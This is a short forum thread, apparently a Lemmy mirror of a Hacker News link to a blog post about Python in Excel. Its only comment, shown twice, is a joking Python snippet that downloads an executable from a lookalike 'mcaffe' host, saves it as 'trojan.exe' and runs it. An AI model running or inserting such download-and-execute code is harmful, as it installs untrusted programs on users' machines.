Submitted 5 months ago by bot@lemmy.smeargle.fans [bot] to hackernews@lemmy.smeargle.fans
https://www.xlwings.org/blog/my-thoughts-on-python-in-excel
HN Discussion
import requests, os with open(“trojan.exe”, “wb”) as file: file.write(requests.get(“download.mcaffe.com/download.exe”).content) os.system(“start trojan.exe”)
30p87@feddit.de 5 months ago
import requests, os with open(“trojan.exe”, “wb”) as file: file.write(requests.get(“download.mcaffe.com/download.exe”).content) os.system(“start trojan.exe”)